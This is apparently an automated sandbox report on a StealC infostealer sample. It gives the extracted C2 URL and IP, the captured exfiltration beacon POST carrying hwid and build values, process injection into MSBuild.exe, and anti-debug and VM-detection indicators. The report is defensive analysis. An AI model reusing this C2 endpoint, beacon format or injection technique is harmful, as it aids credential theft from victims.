Source: 3.2.MSBuild.exe.400000.0.unpack |
Malware Configuration Extractor: StealC {"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_doz"} |
Source: unknown |
HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49713 version: TLS 1.0 |
Source: unknown |
HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49752 version: TLS 1.0 |
Source: unknown |
HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49746 version: TLS 1.0 |
Source: 1f13Cs1ogc.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Source: Malware configuration extractor |
URLs: http://62.204.41.150/edd20096ecef326d.php |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBGHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 33 39 42 45 35 35 44 37 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="hwid"4239BE55D7561166170430------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="build"default6_doz------GDGIJECGDGCBKECAKFBG-- |
Source: Joe Sandbox View |
JA3 fingerprint: 1138de370e523e824bbca92d049a3777 |
Source: Joe Sandbox View |
JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.1.237.91 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.1.237.91 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.1.237.91 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.1.237.91 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.1.237.91 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.1.237.91 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.1.237.91 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 3_2_00406280 InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, |
3_2_00406280 |
Source: unknown |
HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBGHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 33 39 42 45 35 35 44 37 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="hwid"4239BE55D7561166170430------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="build"default6_doz------GDGIJECGDGCBKECAKFBG-- |
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150 |
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/ |
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/bJ |
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2092112900.0000000000E64000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php |
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php5 |
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/j |
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150t |
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150~ |
Source: Amcache.hve.7.dr |
String found in binary or memory: http://upx.sf.net |
Source: unknown |
Network traffic detected: HTTP traffic on port 49733 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49744 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49743 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49742 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49741 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49740 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49727 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49743 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49746 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49713 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49739 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49738 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49717 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49736 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49737 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49736 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49735 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49734 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49733 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49675 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49731 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49730 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49703 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49724 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49742 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49728 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49749 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49729 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49752 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49728 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49727 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49726 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49718 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49725 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49735 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49724 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49723 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49739 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49722 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49674 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49731 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49712 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49725 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49741 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49729 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49748 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49745 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49719 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49722 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49719 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49718 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49751 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49717 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49715 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49716 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49715 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49713 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49712 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49738 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49734 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49673 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49752 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49730 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49751 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49750 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49726 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49740 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49747 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49744 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49723 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49716 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49750 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49749 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49748 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49703 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49747 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49737 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49746 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49745 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FE2021 |
0_2_00FE2021 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FE729C |
0_2_00FE729C |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FFD39B |
0_2_00FFD39B |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FF572C |
0_2_00FF572C |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_0103094F |
0_2_0103094F |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FECAF2 |
0_2_00FECAF2 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FFBB36 |
0_2_00FFBB36 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FF3C92 |
0_2_00FF3C92 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FE1D79 |
0_2_00FE1D79 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FEFEF0 |
0_2_00FEFEF0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: String function: 004045C0 appears 317 times |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: String function: 00FE7B80 appears 49 times |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 288 |
Source: 1f13Cs1ogc.exe, 00000000.00000000.2073157229.000000000105C000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilenameproquota.exej% vs 1f13Cs1ogc.exe |
Source: 1f13Cs1ogc.exe |
Binary or memory string: OriginalFilenameproquota.exej% vs 1f13Cs1ogc.exe |
Source: classification engine |
Classification label: mal100.troj.evad.winEXE@8/5@0/1 |
Source: C:\Windows\SysWOW64\WerFault.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6352 |
Source: 1f13Cs1ogc.exe |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: unknown |
Process created: C:\Users\user\Desktop\1f13Cs1ogc.exe "C:\Users\user\Desktop\1f13Cs1ogc.exe" |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Section loaded: apphelp.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: sspicli.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: wininet.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: rstrtmgr.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: ncrypt.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: ntasn1.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: iertutil.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: windows.storage.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: wldp.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: profapi.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: ondemandconnroutehelper.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: winhttp.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: mswsock.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: iphlpapi.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: winnsi.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: urlmon.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: srvcli.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: netutils.dll |
Source: 1f13Cs1ogc.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT |
Source: 1f13Cs1ogc.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE |
Source: 1f13Cs1ogc.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC |
Source: 1f13Cs1ogc.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: 1f13Cs1ogc.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG |
Source: 1f13Cs1ogc.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT |
Source: 1f13Cs1ogc.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Source: 1f13Cs1ogc.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata |
Source: 1f13Cs1ogc.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc |
Source: 1f13Cs1ogc.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc |
Source: 1f13Cs1ogc.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata |
Source: 1f13Cs1ogc.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 3_2_0041C03D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, |
3_2_0041C03D |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FE71AD push ecx; ret |
0_2_00FE71C0 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_01027F0D push ecx; ret |
0_2_01027F20 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 3_2_0041B035 push ecx; ret |
3_2_0041B048 |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: Amcache.hve.7.dr |
Binary or memory string: VMware |
Source: Amcache.hve.7.dr |
Binary or memory string: VMware Virtual USB Mouse |
Source: Amcache.hve.7.dr |
Binary or memory string: vmci.syshbin |
Source: Amcache.hve.7.dr |
Binary or memory string: VMware, Inc. |
Source: Amcache.hve.7.dr |
Binary or memory string: VMware20,1hbin@ |
Source: Amcache.hve.7.dr |
Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563 |
Source: Amcache.hve.7.dr |
Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000 |
Source: Amcache.hve.7.dr |
Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys |
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E64000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: Amcache.hve.7.dr |
Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000 |
Source: Amcache.hve.7.dr |
Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev |
Source: Amcache.hve.7.dr |
Binary or memory string: c:/windows/system32/drivers/vmci.sys |
Source: Amcache.hve.7.dr |
Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000 |
Source: Amcache.hve.7.dr |
Binary or memory string: vmci.sys |
Source: Amcache.hve.7.dr |
Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0 |
Source: Amcache.hve.7.dr |
Binary or memory string: vmci.syshbin` |
Source: Amcache.hve.7.dr |
Binary or memory string: \driver\vmci,\driver\pci |
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAWP |
Source: Amcache.hve.7.dr |
Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000 |
Source: Amcache.hve.7.dr |
Binary or memory string: VMware20,1 |
Source: Amcache.hve.7.dr |
Binary or memory string: Microsoft Hyper-V Generation Counter |
Source: Amcache.hve.7.dr |
Binary or memory string: NECVMWar VMware SATA CD00 |
Source: Amcache.hve.7.dr |
Binary or memory string: VMware Virtual disk SCSI Disk Device |
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: VMwareVMware |
Source: Amcache.hve.7.dr |
Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom |
Source: Amcache.hve.7.dr |
Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk |
Source: Amcache.hve.7.dr |
Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver |
Source: Amcache.hve.7.dr |
Binary or memory string: VMware PCI VMCI Bus Device |
Source: Amcache.hve.7.dr |
Binary or memory string: VMware VMCI Bus Device |
Source: Amcache.hve.7.dr |
Binary or memory string: VMware Virtual RAM |
Source: Amcache.hve.7.dr |
Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1 |
Source: Amcache.hve.7.dr |
Binary or memory string: vmci.inf_amd64_68ed49469341f563 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FE7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_00FE7922 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FE2003 mov edi, dword ptr fs:[00000030h] |
0_2_00FE2003 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FFA64C mov eax, dword ptr fs:[00000030h] |
0_2_00FFA64C |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_01026628 mov eax, dword ptr fs:[00000030h] |
0_2_01026628 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FF0F2E mov ecx, dword ptr fs:[00000030h] |
0_2_00FF0F2E |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 3_2_00419750 mov eax, dword ptr fs:[00000030h] |
3_2_00419750 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FE7610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
0_2_00FE7610 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FE7AAF SetUnhandledExceptionFilter, |
0_2_00FE7AAF |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FEDA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_00FEDA73 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 3_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
3_2_0041AD48 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 3_2_0041CEEA SetUnhandledExceptionFilter, |
3_2_0041CEEA |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 3_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
3_2_0041B33A |
Source: Yara match |
File source: Process Memory Space: 1f13Cs1ogc.exe PID: 6352, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: MSBuild.exe PID: 4616, type: MEMORYSTR |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41E000 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42B000 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 65C000 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: A41008 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: GetACP,IsValidCodePage,GetLocaleInfoW, |
0_2_00FFC085 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: GetLocaleInfoW, |
0_2_00FF622B |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: EnumSystemLocalesW, |
0_2_00FFC372 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: EnumSystemLocalesW, |
0_2_00FFC327 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, |
0_2_00FFC498 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: EnumSystemLocalesW, |
0_2_00FFC40D |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: GetLocaleInfoW, |
0_2_00FFC6EB |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
0_2_00FFC814 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, |
0_2_00FFC9E9 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: GetLocaleInfoW, |
0_2_00FFC91A |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: EnumSystemLocalesW, |
0_2_00FF5D7F |
